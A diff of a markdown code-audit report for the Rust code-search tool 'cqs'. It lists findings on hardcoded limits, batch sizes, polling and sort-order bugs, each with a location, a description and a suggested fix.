+- **Suggested fix:** Short-circuit at the top: `if report.overall.n == 0 { eprintln!("[eval] no queries with gold_chunk; refusing to emit report (use --allow-empty to override)"); std::process::exit(2); }`. Also add an assertion or return Err when computing the ratio with N==0, so the failure happens at the report-build site and the error message carries the fixture name.
+
+#### RB-9: `wait_for_fresh` infinite poll loop on slow daemon — no max-poll-iterations safety
+- **Difficulty:** medium
+- **Location:** `src/daemon_translate.rs:665-678`
+- **Description:** The loop polls every 250ms until the deadline. If `daemon_status` returns `Ok` immediately on every call but `is_fresh()` keeps flipping false (e.g. a very busy reindex queue that drains and re-fills as fast as the watch loop ticks), the function spins for the full `wait_secs` budget burning CPU on `daemon_status` calls (each makes a Unix socket connect, write, read) and never makes progress. Worse: each poll call connects to the same daemon socket, so a 600-second poll = 2400 socket connects on a healthy daemon — eats `accept` budget on the daemon side and shows up as a thundering-herd in journal logs. There's no exponential backoff or circuit breaker.
+- **Suggested fix:** Cap poll count at `wait_secs * 4` (4 polls/sec is the implied rate) AND introduce an exponential backoff between failed-but-Ok polls: 250ms → 500ms → 1s → 2s, capped at 5s. The 95th-percentile case (daemon already fresh) still returns in one poll; the unhealthy case stops hammering the socket.
+
+#### RB-10: `now_unix_secs()` swallows clock-before-epoch errors as `0`, masking systemic bad-clock conditions
+- **Difficulty:** easy
+- **Location:** `src/watch_status.rs:226-231`
+- **Description:** `SystemTime::now().duration_since(UNIX_EPOCH).map(...).unwrap_or(0)` silently returns `0` (= 1970-01-01) on a clock-before-epoch error. This is reachable on real systems: a Raspberry Pi or VM that boots before NTP sync can have a clock around 1970, on WSL a hypervisor pause-and-resume across host-clock changes can produce transient backwards jumps, on Windows a misconfigured RTC can present 1601-epoch values. When this happens, every WatchSnapshot publishes `snapshot_at: 0`, every JSON consumer sees the snapshot is "from 1970" and downstream freshness logic that does `now - snapshot_at > threshold` (e.g. "is the snapshot itself stale?") suddenly thinks every snapshot is 56 years stale and marks the daemon dead. Silent fallback to `0` collides with "missing/unknown" semantics.
+- **Suggested fix:** On the `Err` branch, emit a `tracing::warn!` once (use `OnceLock`) so journal logs surface the bad-clock condition, and return `None`/`-1` instead of `0` so consumers can distinguish "clock is broken" from "snapshot is genuinely from 1970". Update `WatchSnapshot::snapshot_at` to `Option<i64>` to make the missing-clock case unrepresentable as a valid timestamp.
+# v1.30.1 Audit Findings — Scaling & Hardcoded Limits
+
+Generated: 2026-04-28T18:28:34Z
+
+Audit mode: ON. Scope: constants that should scale with model config / corpus size / hardware; magic numbers without rationale; defaults sized for testing; dimensions hardcoded for the default model.
 
 ## Scaling & Hardcoded Limits
 
-#### [SHL-V1.30-1]: CAGRA `itopk_size = (k * 2).clamp(itopk_min, itopk_max)` can produce `itopk_size < k` on small indexes — silent zero-result regression
-- **Difficulty:** medium
-- **Location:** `src/cagra.rs:359` (computation), `:166-170` (`cagra_itopk_max_default`)
-- **Description:** cuVS CAGRA requires `itopk_size >= k` as a hard constraint — when violated, the call to `params.set_itopk_size(itopk_size)` followed by `Index::search` is the historical cause of the documented `topk=500 > itopk_size=480` failure mode (per `MEMORY.md`: "CAGRA fails at limit≥100 via `topk=500 > itopk_size=480` — keep eval at limit=20"). The current code computes `itopk_size = (k * 2).clamp(itopk_min, itopk_max)` where `itopk_max = (log2(n_vectors) * 32).clamp(128, 4096)`. For a small index (n_vectors = 1000 → itopk_max ≈ 320) and a user request of `k = 500` (e.g., `cqs search --limit 500`), the computation becomes `(1000).clamp(128, 320) = 320 < 500 = k`. The constraint is violated, no guard is present, and the eval-time workaround ("keep eval at limit=20") is the only thing protecting users from this. There is no `if itopk_size < k { fall back to HNSW }` branch, no error to the caller, and no clamp on `k` itself. Anyone wiring `cqs search --rerank --limit 200` (legitimate to give the reranker a 200-candidate pool) on a corpus that hasn't grown past ~13k chunks will silently produce undefined cuVS behavior.
-- **Suggested fix:** Either (a) clamp `itopk_size = itopk_size.max(k)` after the existing clamp, then re-check that the result `<= itopk_max` and degrade to HNSW above that (cleanly returning a typed error from `search_impl`), or (b) clamp `k` itself to `itopk_max - 1` at search-entry and surface a `tracing::warn!` so the caller knows the limit was reduced. A `// CONSTRAINT: itopk_size >= k (cuVS hard requirement)` comment on the constant declaration would prevent regressions during refactors.
-
-#### [SHL-V1.30-2]: `nl::generate_nl_with_template` char_budget defaults to 512 even when the active model has `max_seq_length=2048` — nomic-coderank silently truncates at 25% of capacity
+#### SHL-V1.30-1: `embed_batch_size_for` is dead code — production still uses unscaled `embed_batch_size()` of 64
 - **Difficulty:** easy
-- **Location:** `src/nl/mod.rs:222-229`
-- **Description:** Section-chunk NL generation reads `CQS_MAX_SEQ_LENGTH` once into a `OnceLock` with default 512: `let max_seq = *MAX_SEQ.get_or_init(|| std::env::var("CQS_MAX_SEQ_LENGTH").ok().and_then(|v| v.parse().ok()).unwrap_or(512));`. The actual model's `max_seq_length` is encoded in `ModelConfig` (E5/v9-200k/BGE: 512; **nomic-coderank: 2048** per `embedder/models.rs:366`). Switching to nomic-coderank via preset/config without setting `CQS_MAX_SEQ_LENGTH` silently caps the per-section content preview at ~1800 chars instead of ~7800 chars — every section chunk gets truncated to 23% of what the model can accept. The comment at line 220-221 even says "Larger models (8192 → ~32000 chars) get more context", acknowledging the relationship but not wiring it through `ModelConfig`. This is the same "convenience wrapper hardcoded 768-dim while default model was 1024" pattern flagged in `MEMORY.md` as a historical bug.
-- **Suggested fix:** Plumb the active `Embedder`'s `model_config.max_seq_length` into `generate_nl_with_template` (it's currently a free function with no embedder access). Either pass it as an argument from the caller in `pipeline/parsing.rs`, or move section-NL into an `Embedder::generate_nl` method. The env var should be a fallback override, not the source of truth.
+- **Location:** `src/cli/pipeline/types.rs:178-207`, `src/cli/pipeline/parsing.rs:42`, `src/cli/enrichment.rs:74`
+- **Description:** P2.41 in the v1.30.0 triage was marked "fixed (added `embed_batch_size_for(model)`; pipeline migration follow-on)" — but the helper is still `#[allow(dead_code)]` and zero production callers exist. `pipeline::parsing::run_pipeline` (line 42) and `cli::enrichment::run_enrich` (line 74) both call the legacy `embed_batch_size()` which returns 64 regardless of model. The helper's own docstring is explicit: "Nomic-coderank (768 dim, 2048 seq) at batch=64 OOMs the same GPU because the tensor blows up to ~390 MB." So when a user runs `cqs index --model nomic-coderank` on the default RTX 4060 8GB, the indexer ships the OOM-known config. The wiring-verification rule in CLAUDE.md (the configurable-models disaster) is the exact pattern: API exists, no production calls.
+- **Suggested fix:** Migrate the two production sites to `embed_batch_size_for(model)`. Drop `#[allow(dead_code)]`. Mark the legacy `embed_batch_size()` `#[deprecated]` or rename to `embed_batch_size_legacy_test_only` so test callers stay valid but production grep clearly fails.
 
-#### [SHL-V1.30-3]: `MAX_BATCH_SIZE = 10_000` in LLM module hardcoded — silently truncates summary/HyDE passes on large corpora
+#### SHL-V1.30-2: `wait_for_fresh` poll interval hardcoded at 250 ms — no env knob
 - **Difficulty:** easy
-- **Location:** `src/llm/mod.rs:192`, used at `summary.rs:58,92`, `hyde.rs:39-41`, `doc_comments.rs:271`
-- **Description:** `const MAX_BATCH_SIZE: usize = 10_000;` is the per-pass cap on Anthropic Batches API submissions. For cqs's own ~17k-chunk corpus this fits in one pass; for any monorepo with >10k callable chunks the user gets a silent truncation — `summary.rs:92-97` does emit a `tracing::info!("Batch size limit reached, submitting partial batch")` but downstream a user must rerun the same `cqs index --improve-docs` or `cqs index --improve-summaries` repeatedly to make progress, with no flag to raise the cap and no visible "X chunks remain unprocessed" hint at CLI exit. Anthropic's actual Batches API hard limit is 100,000 requests per batch — cqs uses 10% of that. No env override, no config section, no CLI flag. With nomic-coderank/CodeRankEmbed enabling much larger corpora to be useful, this becomes a real ceiling. Also note that `hyde.rs:41` also uses this for HyDE expansion which has very different cost characteristics.
-- **Suggested fix:** Move `MAX_BATCH_SIZE` to `src/limits.rs` with an env resolver (`CQS_LLM_MAX_BATCH_SIZE` default 10000, capped at 100000 to honor Anthropic's hard limit). Surface "X chunks remain — rerun to continue" at CLI exit when the cap is hit (today's `tracing::info!` is invisible without `RUST_LOG=info`).
+- **Location:** `src/daemon_translate.rs:663`
+- **Description:** `wait_for_fresh` is the shared client-side gate for `cqs status --watch-fresh --wait` and `cqs eval --require-fresh`. It hardcodes `poll_interval = Duration::from_millis(250)`. On a 100k-chunk reindex after `git checkout`, the daemon takes seconds-to-minutes to converge — 250ms polling is fine but generates ~240 socket accepts/min on the daemon. Conversely, on tiny corpora a 250ms first-poll latency is noticeable in CI orchestration scripts that fire `cqs eval` back-to-back. No env override exists; the comment claims "callers don't pay 250 ms latency on an already-fresh tree" because the loop polls before sleeping (correct), but every subsequent cycle pays the full 250ms. Adjacent constants (`CQS_DAEMON_TIMEOUT_MS`, `CQS_WATCH_RECONCILE_SECS`, `CQS_DAEMON_PERIODIC_GC_INTERVAL_SECS`) all have env knobs — this one is an outlier.
+- **Suggested fix:** Add `CQS_FRESHNESS_POLL_MS` to `crate::limits` with a sane default of 250, floor of ~25, ceiling of ~5000. Read once per `wait_for_fresh` call so tests can flip values without rebuild.
 
-#### [SHL-V1.30-4]: `serve::ABS_MAX_GRAPH_NODES = 50_000` and `ABS_MAX_CLUSTER_NODES = 50_000` hardcoded — graph/cluster views silently cap at arbitrary 25% subset of large monorepos
+#### SHL-V1.30-3: `eval --require-fresh-secs` silently capped to 600 s inside the wait helper
 - **Difficulty:** easy
-- **Location:** `src/serve/data.rs:17,24`
-- **Description:** Both `pub(crate) const`. The cluster query (`build_cluster`) sorts by `id ASC LIMIT effective_cap` — at 200k chunks, the cluster view shows 25% of the corpus chosen by id-string lexical order, which is essentially random with respect to topology or coverage. The graph view has the same arbitrary truncation. The comment at line 14-16 ("Prevents a single unauth request from materialising the full chunks table (millions of rows)") is a SEC-3 motivation, but the *value* 50k is a guess, not derived from anything (RAM ceiling, JSON serialization budget, browser rendering capacity). No env override; no config; no `?max_nodes` ceiling for trusted operators. A user running `cqs serve` on a 500k-chunk monorepo opens the graph view and sees an unspecified slice with no warning. Cytoscape's practical render ceiling is around 5k-10k nodes anyway, so 50k is too high for the UI side and too low for a "show me everything" power-user query.
-- **Suggested fix:** Keep the security cap, but add `CQS_SERVE_MAX_GRAPH_NODES` and `CQS_SERVE_MAX_CLUSTER_NODES` env overrides (with a hard ceiling, e.g., `1_000_000`, that even env can't exceed). Better: derive from `chunk_count` so small projects ship the whole graph and large projects ship the top-N by `n_callers_global` (already an indexed column). The graph endpoint also needs a documented "show me a focused subgraph around node X" mode for monorepos.
+- **Location:** `src/cli/commands/eval/mod.rs:237`, helper at line 246
+- **Description:** The CLI's `--require-fresh-secs` clap default is 600. But the helper *also* applies `let budget_secs = wait_secs.min(600);` — so a user passing `--require-fresh-secs 3600` (deliberately for a huge `cqs ref` package or a 100k-chunk post-checkout reindex) gets silently clamped to 600 with no warning. The flag's docstring at line 83 says "Capped at 600 (10 min) inside the wait helper so a runaway agent can't pin the socket" — but a runaway agent can still call `cqs eval` in a loop with `--no-require-fresh` if it really wants to. The cap punishes legitimate slow-corpus users while not actually closing the runaway-agent door. The 600-second cap is a magic number lifted from "10 minutes feels right" with no scaling rationale (corpus-aware: a `cqs ref` package can take 30+ minutes to reindex from cold).
+- **Suggested fix:** Either (a) drop the `min(600)` clamp and trust the user's flag value, or (b) raise the ceiling significantly (e.g. 7200 / 2h) and emit a `tracing::warn!` when the clamp engages so users see "your --require-fresh-secs=3600 was clamped to 600". Add an env knob `CQS_EVAL_REQUIRE_FRESH_MAX_SECS` for operator override.
 
-#### [SHL-V1.30-5]: `build_chunk_detail` callers/callees/tests `LIMIT 50/50/20` hardcoded SQL constants — silent truncation in the chunk-detail UI on hot functions
+#### SHL-V1.30-4: `task::run_task` hardcodes BFS knobs (depth=2, max_nodes=100, multiplier=3) with no env / CLI override
 - **Difficulty:** easy
-- **Location:** `src/serve/data.rs:505,542,571`
-- **Description:** Three SQL queries inside `build_chunk_detail` — `callers_rows` (`LIMIT 50`), `callees_rows` (`LIMIT 50`), `tests_rows` (`LIMIT 20`) — pin the chunk-detail sidebar to fixed truncation. A heavily-called function on a large corpus (e.g., `Store::query` with 200+ callers) shows the first 50 by `(origin, line_start)` and silently drops the rest with no "showing 50 of 247" indicator. The 20-test cap is even more painful for popular utilities — `cqs::Embedding::new` may have 100+ test references. No env override, no SQL parameter binding, no JSON `truncated: true` flag in the response. Inconsistent with `build_graph` which honors `max_nodes` from the request.
-- **Suggested fix:** Bind these as `?` parameters (already done via `LIMIT ?` for `build_graph`, just not here), accept `?max_callers` / `?max_callees` / `?max_tests` query params, and emit `truncated: true` in the response when the cap is hit. Source the defaults from `src/limits.rs` so the same value drives the UI, the test, and any future CLI consumer.
+- **Location:** `src/task.rs:19-25,143-149`
+- **Description:** `cqs task` is a public CLI command meant for "implementation brief: scout + gather + impact + placement". It hardcodes:
+  - `TASK_GATHER_DEPTH = 2` — BFS expansion depth
+  - `TASK_GATHER_MAX_NODES = 100` — node ceiling
+  - `TASK_GATHER_LIMIT_MULTIPLIER = 3` — over-fetch factor
+  
+  The underlying `gather` subsystem honors `CQS_GATHER_MAX_NODES` via `DEFAULT_MAX_EXPANDED_NODES`, but `task` overrides that with its hardcoded 100 by calling `.with_max_expanded_nodes(TASK_GATHER_MAX_NODES)`. So the gather env knob is silently ignored when invoked through `task`. On a 50k+ chunk corpus where 100 nodes can't capture a real-feature implementation surface, the user has no recourse short of editing source.
+- **Suggested fix:** Read `CQS_TASK_GATHER_DEPTH` / `CQS_TASK_GATHER_MAX_NODES` (or just inherit the same `CQS_GATHER_*` env vars `gather` already uses) instead of hardcoding. Defaults stay at 2/100/3. Add CLI flags `--task-depth N` / `--task-max-nodes N` if the typical workflow is "I need broader context for this one task".
 
-#### [SHL-V1.30-6]: `embed_batch_size()` default 64 doesn't scale with model dim or available VRAM — RTX 4060 OOMs while A6000 idles
-- **Difficulty:** medium
-- **Location:** `src/cli/pipeline/types.rs:143-160`, `src/embedder/mod.rs:685-689`
-- **Description:** Embedding batch size defaults to 64 regardless of model (768-dim E5 vs 1024-dim BGE-large), regardless of `max_seq_length` (512 BGE vs 2048 nomic), regardless of GPU VRAM. Forward-pass activations scale roughly linearly in `batch * seq_len * hidden_dim`. With BGE-large + 512 seq + 64 batch on the embedder-default ORT path: ~64 × 512 × 1024 × 4 bytes ≈ 130 MB just for one tensor — fits a 4060 8GB. With nomic-coderank + 2048 seq + 64 batch: ~512 MB per tensor × multiple intermediate states → OOM on consumer GPUs. The comment at line 139-141 even says: "Was 32 (backed off from 64 after an undiagnosed crash at 2%). Restored to 64 with debug logging" — meaning we've already had a silent crash on this exact knob, and the resolution was "raise it back and add tracing" rather than make it dim/seq-aware. The eval-only `CQS_EMBED_BATCH_SIZE` env override exists but no auto-tuning.
-- **Suggested fix:** When `CQS_EMBED_BATCH_SIZE` is unset, compute `64 * (768 / model_config.dim) * (512 / model_config.max_seq_length).max(0.25)` rounded to a power of 2. Or query GPU VRAM via `nvml-wrapper` (already a transitive dep via cuVS) and target ~25% of free VRAM. At minimum, document the dim/seq sensitivity in the const's docstring so future operators know to tune.
-
-#### [SHL-V1.30-7]: `diff::EMBEDDING_BATCH_SIZE = 1000` doesn't scale with model dim — 2.6× memory variance between presets
+#### SHL-V1.30-5: `onboard` callee/caller fetch caps hardcoded at 30/15 — no env or CLI override
 - **Difficulty:** easy
-- **Location:** `src/diff.rs:158`
-- **Description:** Comment at line 156-157: "For 20k pairs at ~12 bytes/dim * model_dim, each batch is ~9-12 MB instead of ~240 MB total." The math is correct only for ~1024-dim BGE-large. For 384-dim presets, batch is ~4.6 MB; for 1024-dim it's ~12 MB. More critically, the batch *count* scales with model dim because the 1000 figure was set assuming ~1KB/embedding. With future presets shipping 1536-dim or 2048-dim (or the common case of stacking SPLADE sparse vectors alongside dense), the same batch is 18 MB or 24 MB — still OK, but not what the comment promises. No env override. Worse: the user-visible behavior of `cqs diff` (latency, memory) silently changes when you swap the model preset, with no log or doc.
-- **Suggested fix:** Compute `EMBEDDING_BATCH_SIZE = max(100, 12_000_000 / (model_dim * 12))` (target 12 MB per batch regardless of dim). Or expose `CQS_DIFF_EMBEDDING_BATCH_SIZE` env override and document the dim relationship.
+- **Location:** `src/onboard.rs:30-33,174-175`
+- **Description:** `cqs onboard` is the "guided codebase tour". `MAX_CALLEE_FETCH = 30` and `MAX_CALLER_FETCH = 15` cap the BFS-discovered nodes that get content fetched. There's a separate `DEFAULT_ONBOARD_DEPTH = 3` that *is* a public const, but the fetch caps are private and no env override exists. For an onboard query targeting a high-fanout entry point (e.g. `Store::open` has 50+ callers in this codebase alone), 15 callers is half the picture and the user gets a misleading "reading list" without knowing that ~70% of callers were silently dropped. The agent docs (`README.md`) sell `onboard` as a comprehensive tour — silent truncation undermines that contract.
+- **Suggested fix:** Promote the constants to env-overridable resolvers (`CQS_ONBOARD_CALLEE_FETCH`, `CQS_ONBOARD_CALLER_FETCH`) and add a `--max-callees N` / `--max-callers N` pair to the `cqs onboard` clap definition. When the cap engages, surface the truncation in the `OnboardSummary` JSON so callers can react instead of silently misinterpreting completeness.
 
-#### [SHL-V1.30-8]: `CagraIndex::gpu_available()` checks only that cuVS resources can be created — no VRAM ceiling, OOMs on 8GB GPUs at ~200k chunks
-- **Difficulty:** medium
-- **Location:** `src/cagra.rs:262-264`
-- **Description:** `pub fn gpu_available() -> bool { cuvs::Resources::new().is_ok() }` returns true on any CUDA-capable GPU. Once `chunk_count >= 5000` (the CAGRA threshold), the build path runs `Index::build(&resources, &build_params, &dataset)` where dataset is `Array2::from_shape_vec((n_vectors, dim), flat_data)`. For a 200k-chunk × 1024-dim corpus this is 200k × 1024 × 4 = 819 MB on host, then copied to GPU plus graph overhead (~64 edges × n_vectors × 4 = 51 MB) plus working memory. On an 8GB GPU shared with the embedder model (~1.3 GB BGE-large) and OS/window overhead (~1-2 GB), the build OOMs. The CPU-side `cagra_max_bytes()` (default 2GB) gates host array allocation, but doesn't model GPU VRAM at all. The user reads the `MEMORY.md` line "GPUs: A6000 48GB (training), RTX 4000 8GB (inference)" — cqs is shipped for an A6000 workstation but published to crates.io for everyone else.
-- **Suggested fix:** Query free GPU VRAM via cuVS / cuda-rs / nvml at `gpu_available()` time. Compute estimated build memory (`n_vectors * dim * 4 + graph_degree * n_vectors * 4 + slack`) and return false if it exceeds 80% of free VRAM. Surface as a `tracing::warn!("GPU has X MB free, CAGRA build needs Y MB — falling back to HNSW")`. Add a `CQS_CAGRA_MAX_GPU_BYTES` override for users who want to force-try.
-
-#### [SHL-V1.30-9]: Daemon `worker_threads = min(num_cpus, 4)` hardcoded with no env override — caps shared-runtime parallelism on large machines
+#### SHL-V1.30-6: `MAX_REFERENCES = 20` hardcoded in config validator — no env knob
 - **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:115-119`
-- **Description:** `let worker_threads = std::thread::available_parallelism().map(|n| n.get()).unwrap_or(1).min(4);` — the shared tokio runtime that powers Store, EmbeddingCache, and QueryCache caps at 4 worker threads. On a 24-core workstation (per `MEMORY.md`), this means the daemon's SQLx pool can only meaningfully drive 4 connections worth of concurrent work even if the SQLite pool is sized larger. The hardcoded ceiling came from "the heaviest of the three" pre-#968 default. With an 8-core laptop on battery, `min(8, 4) = 4` is fine; on a 32-core EPYC server, `min(32, 4) = 4` leaves 28 cores idle. No env override.
-- **Suggested fix:** Read `CQS_DAEMON_WORKER_THREADS` (default `min(num_cpus, 4)` to preserve existing behavior). Document at the constant's docstring that this is the shared-runtime size for the daemon process specifically.
+- **Location:** `src/config.rs:390-405`
+- **Description:** `Config::validate` truncates `references` to the first 20 entries with a stderr warning. The rationale comment cites "~50-100MB RAM per reference" → ~1-2GB at 20. But on the project's own A6000 workstation with 256+ GB RAM, this is conservative by ~100×. With v1.30 named slots, a project may legitimately want 25-30 reference packages (every major dependency family). The user has no way to opt up. Hard-cap with no escape hatch.
+- **Suggested fix:** Replace the const with `crate::limits::max_references()` reading `CQS_MAX_REFERENCES` (default 20, no upper ceiling — let the user OOM their own machine if they ask for it). Memo the warning so it fires at *load* time not *every validate call*. Keep the existing soft warning; remove the silent truncation when env override is set.
 
-#### [SHL-V1.30-10]: `train_data::MAX_SHOW_SIZE = 50 MB` for `git show` hardcoded — silently drops large files from training-data extraction
+#### SHL-V1.30-7: `MAX_NOTES_FILE_SIZE = 10 MB` hardcoded twice with no env knob
 - **Difficulty:** easy
-- **Location:** `src/train_data/git.rs:167`
-- **Description:** `const MAX_SHOW_SIZE: usize = 50 * 1024 * 1024;` — `git_show` returns `Ok(None)` (treated as "skip this file") when stdout exceeds 50 MB. Used during training-data extraction (referenced in `~/training-data/` per memory). Generated SQL bundles, vendored deps, large docs, and minified web assets routinely exceed 50 MB. There's no log line at the call site; the caller (`pub fn git_show -> Result<Option<String>>`) treats `None` as "binary or too large", losing the distinction. No env override, no `--max-show-size` flag. The `crate::limits` module already houses similar caps (`PARSER_MAX_FILE_SIZE`, `parser_max_file_size()`) — this one was missed.
-- **Suggested fix:** Move `MAX_SHOW_SIZE` to `src/limits.rs` with `train_data_git_show_max_bytes()` reading `CQS_TRAIN_GIT_SHOW_MAX_BYTES`. Distinguish "too large" from "binary" in the return type so callers can warn-log truncations explicitly.
+- **Location:** `src/note.rs:169` and `src/note.rs:245` (duplicate definitions)
+- **Description:** Two separate `const MAX_NOTES_FILE_SIZE: u64 = 10 * 1024 * 1024;` declarations in different functions of the same file — DRY violation in addition to the scaling concern. 10 MB is plenty for hand-edited `notes.toml`, but on a long-running project with `cqs notes add` invocations from agents, the file can grow. There's also a separate `MAX_NOTES = 10_000` (line 20) that silently truncates parses (line 331) — comment at line 612 acknowledges "Files with > MAX_NOTES entries are truncated silently". Two magic numbers, both potential silent-failure surfaces.
+- **Suggested fix:** Hoist a single `const MAX_NOTES_FILE_SIZE` to module scope. Wrap with an env-overridable resolver `crate::limits::max_notes_file_size()` reading `CQS_NOTES_MAX_FILE_SIZE` (default 10 MB). Same treatment for `MAX_NOTES` via `CQS_NOTES_MAX_ENTRIES`. Surface the silent truncation as a `tracing::warn!` instead of a silent `take(MAX_NOTES)`.
 
+#### SHL-V1.30-8: `ENRICHMENT_PAGE_SIZE = 500` hardcoded — no env knob; affects 100k-chunk reindex memory
+- **Difficulty:** easy
+- **Location:** `src/cli/enrichment.rs:46,127`
+- **Description:** Enrichment pages chunks at 500/page, batch-fetches callers/callees per page (line 142-143). Adjacent comments call out that `all_summaries` / `all_hyde` / `all_enrichment_hashes` are intentionally pre-loaded once (~20MB at 100k chunks) — so the design *does* care about memory at scale — but the page size itself is unmovable. On a small repo (this one, 17k chunks) 500 is 35 pages, fine. On a 200k+ chunk reference package the query batch for callers/callees per page becomes the dominant cost and a tunable would help. Other pipeline batch sizes (`embed_batch_size`, `file_batch_size`) all have env knobs; this one is the outlier.
+- **Suggested fix:** Promote to `crate::limits::enrichment_page_size()` reading `CQS_ENRICHMENT_PAGE_SIZE` with default 500. Allows operators on huge corpora to drop it to 100 (less per-page memory, more SQLite round-trips) or push it to 2000 (fewer round-trips, more memory).
 
+#### SHL-V1.30-9: `LAST_INDEXED_PRUNE_SIZE_THRESHOLD = 5_000` doc claims "intentionally not an env var" — but `cqs ref` packages routinely exceed
+- **Difficulty:** easy
+- **Location:** `src/cli/watch/gc.rs:36-42`
+- **Description:** The watch loop's `last_indexed_mtime` dedup map prunes at >5,000 entries. Comment says "intentionally not an env var to avoid knob proliferation. Re-adding a file on its next watch event is a trivial insert". That reasoning holds for normal-sized repos. For an indexed `cqs ref linux-kernel` (~75k files), the prune fires every cycle, dedup loses signal across cycles, and the watch loop ends up reindexing files it just touched because the prune dropped their last-indexed timestamp. The CLAUDE.md memory entry "Knob Count Depends on Consumer — for agent-facing tools (cqs and Monitor), more knobs are cheap and bias toward configurability" applies — this is exactly an agent-facing knob. The "knob proliferation" concern was wrong here.
+- **Suggested fix:** Add `CQS_WATCH_PRUNE_SIZE_THRESHOLD` env knob, default 5_000. For `cqs ref`-heavy setups raise to 50_000 to keep dedup signal across cycles. Keep `LAST_INDEXED_PRUNE_AGE_SECS = 86_400` in place; the recency rule is independent of cardinality.
+
+#### SHL-V1.30-10: `daemon_periodic_gc_cap` env override is read-once via `OnceLock` — `systemctl set-environment` can't change it
+- **Difficulty:** easy
+- **Location:** `src/cli/watch/gc.rs:78-86`
+- **Description:** Adjacent env knobs in the watch module pattern read-on-every-call (e.g. `reconcile_enabled` at `reconcile.rs:154` reads on every tick — explicit goal: "an operator can flip it via `systemctl --user set-environment` without daemon restart"). But `daemon_periodic_gc_cap` caches via `OnceLock` and the comment at line 67 claims "parsed at first read" as if that's a feature. It isn't — it's an inconsistency with the sibling `reconcile_enabled` semantic and breaks the live-tunable contract operators expect. Once the daemon starts, the cap is frozen until restart. CLAUDE.md memory: "for agent-facing tools, more knobs are cheap and bias toward configurability — only requirement is the knob works as specified." This knob doesn't work as specified — the docstring promises env-driven tuning but delivers boot-time-frozen tuning.
+- **Suggested fix:** Drop the `OnceLock` cache. Read on every call (one `getenv` syscall per GC tick is microseconds; ticks are minutes apart). Match the `reconcile_enabled` / `daemon_periodic_gc_interval_secs` / `daemon_periodic_gc_idle_secs` semantic so all four knobs behave the same way operationally.
 ## Algorithm Correctness
 
-#### `semantic_diff` sort by similarity has no secondary tie-breaker — non-deterministic "most changed" ordering across runs
-- **Difficulty:** easy
-- **Location:** `src/diff.rs:202-207` (and the parallel test helper at `src/diff.rs:298-303`)
-- **Description:** `semantic_diff` populates `modified: Vec<DiffEntry>` by iterating a `HashMap` (process-seed-randomized order) and sorts with only one key:
-  ```rust
-  modified.sort_by(|a, b| match (a.similarity, b.similarity) {
-      (Some(sa), Some(sb)) => sa.total_cmp(&sb),
-      (Some(_), None) => std::cmp::Ordering::Less,
-      (None, Some(_)) => std::cmp::Ordering::Greater,
-      (None, None) => std::cmp::Ordering::Equal,
-  });
-  ```
-  Two modified entries with identical similarity (e.g., both 0.73 — common for small, nearly-identical refactors) sort into arbitrary relative order across process invocations because `sort_by` is stable w.r.t. the (HashMap-derived, random) input order, not the data. `cqs diff` and `cqs drift` JSON output will reorder identical rows between runs, defeating diff-the-diff comparisons, breaking test determinism, and making eval-flake hard to reproduce. All other score-sorting sites in the codebase carry a full `(file, name, line_start)` tie-break cascade — this one was missed in the v1.25.0 wave-1 sweep that fixed the rest.
-- **Suggested fix:** Replace the `Equal` fallbacks with a cascade on the stable identity fields `DiffEntry` already carries:
-  ```rust
-  fn cmp_entries(a: &DiffEntry, b: &DiffEntry) -> std::cmp::Ordering {
-      match (a.similarity, b.similarity) {
-          (Some(sa), Some(sb)) => sa.total_cmp(&sb),
-          (Some(_), None) => std::cmp::Ordering::Less,
-          (None, Some(_)) => std::cmp::Ordering::Greater,
-          (None, None) => std::cmp::Ordering::Equal,
-      }
-      .then_with(|| a.file.cmp(&b.file))
-      .then_with(|| a.name.cmp(&b.name))
-      .then_with(|| a.chunk_type.cmp(&b.chunk_type))
-  }
-  ```
-  Apply to both production (line 202) and the test at line 298 so they don't drift. Add a `proptest!`-style shuffling test that asserts the sort is stable across shuffled inputs.
-
-#### `is_structural_query` keyword probe uses `format!(" {} ", kw)` and misses keywords at end-of-query
-- **Difficulty:** easy
-- **Location:** `src/search/router.rs:787-789`
-- **Description:**
-  ```rust
-  STRUCTURAL_KEYWORDS
-      .iter()
-      .any(|kw| query.contains(&format!(" {} ", kw)) || query.starts_with(&format!("{} ", kw)))
-  ```
-  Covers keywords preceded by whitespace and surrounded by whitespace (via `" {} "`) or at the very start (via `"{} "`), but **not keywords at the end of the query**. Concrete failure trace for `"find all trait"` (3 words):
-  - `is_identifier_query`: `"all"` is in `NL_INDICATORS` → returns false.
-  - `is_cross_language_query`: no two language names → false.
-  - `extract_type_hints`: "trait" isn't in the chunk-type hint table (which is phrases like "all traits") → none returned.
-  - `is_structural_query`: `STRUCTURAL_PATTERNS_AC` doesn't match; keyword loop with `kw="trait"` → `query.contains(" trait ")` false (no trailing space), `query.starts_with("trait ")` false. **All keywords fail** → false.
-  - `is_behavioral_query`: no behavioral verb word-match, no "code that"/"function that" → false.
-  - `is_conceptual_query`: `words.len() == 3 <= 3`, `"all"` is NL-indicator match, `!is_structural_query` → **true**.
-  - Routes to `Conceptual` (α=0.70), should have been `Structural` (α=0.90).
-
-  Same pattern for `"show me all trait"`, `"find every impl"`, `"list all enum"`, `"all class"`, `"find enum"`, etc. — i.e., the common NL pattern where a user ends their query with the type they're looking for. This shifts SPLADE α from 0.90 → 0.70 for every such query (≈20% heavier SPLADE weight than intended on Structural), and the strategy enum shifts from `DenseWithTypeHints` → `DenseDefault`, bypassing the type-boost path entirely. Also allocates a `String` per (keyword × probe) iteration on every classify. The adjacent structural-pattern check uses Aho-Corasick — the keyword path should too.
-- **Suggested fix:** Replace with a word-boundary check over the pre-computed `words` vec (same approach already used for `NEGATION_TOKENS`):
-  ```rust
-  pub fn is_structural_query(query: &str) -> bool {
-      if STRUCTURAL_PATTERNS_AC.is_match(query) { return true; }
-      // words is computed once upstream; pass it through instead of re-splitting
-      let words: Vec<&str> = query.split_whitespace().collect();
-      STRUCTURAL_KEYWORDS.iter().any(|kw| words.iter().any(|w| w == kw))
-  }
-  ```
-  Add regression tests: `"find all trait"` → Structural, `"all class"` → Structural, `"find enum"` → Structural. No allocation, correct at EOL, matches the pattern the rest of the router uses.
-
-#### `bfs_expand` processes BFS seeds in HashMap iteration order — non-deterministic `name_scores` when `max_expanded_nodes` cap is reached mid-expansion
-- **Difficulty:** easy
-- **Location:** `src/gather.rs:317-320` (seed enqueue from `name_scores.keys()`) and `src/gather.rs:326,338` (cap checks)
-- **Description:**
-  ```rust
-  let mut queue: VecDeque<(Arc<str>, usize)> = VecDeque::new();
-  for name in name_scores.keys() {
